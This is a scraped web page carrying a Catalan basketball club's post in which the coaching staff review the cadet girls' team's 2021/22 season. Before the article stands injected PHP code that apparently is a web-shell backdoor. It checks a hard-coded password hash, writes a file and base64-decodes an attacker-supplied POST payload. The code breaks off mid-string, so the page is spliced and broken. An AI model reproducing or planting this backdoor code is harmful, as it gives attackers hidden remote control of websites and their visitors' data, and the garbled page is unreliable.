function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El balanç de la temporada 21/22 del Cadet Femení negre -

El balanç de la temporada 21/22 del Cadet Femení negre

By
Updated: juny 23, 2022

El cos tècnic del Cadet femení negre: Irene Urbistondo, Ignasi Icart i Laureà Català fan balanç de la temporada 2021-2022.

Ha sigut una temporada molt complicada des de l’inici per ser un equip amb molt poques jugadores. Amb l’esforç i implicació de les que érem, i l’ajut necessari d’altres equips del club, hem aconseguit completar la temporada amb molt bona nota. L’equip ha millorat en tots els conceptes del joc, hem competit contra tots els equips de la lliga, i finalment hem acabat en una meritòria quarta posició, jugant la final a 4 de la categoria.

Individualment, les jugadores també han experimentat una gran millora, tant en atac com en defensa, i pel fet de ser un equip tan curt, totes han sigut importants en diferents moments i fases del joc, i han aportat de manera decisiva al rendiment global de l’equip.

La temporada vinent canvia l’equip tant pel que fa a les jugadores com a l’equip tècnic. Per part nostra enguany ha sigut una experiència molt positiva a tots els nivells, i només ens queda agrair l’esforç de jugadores, pares, preparador físic, fisioterapeuta, club en general, i desitjar que la temporada vinent sigui encara millor per tothom.

Sense cap mena de dubte, un equip amb 100% #ADNTGN 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *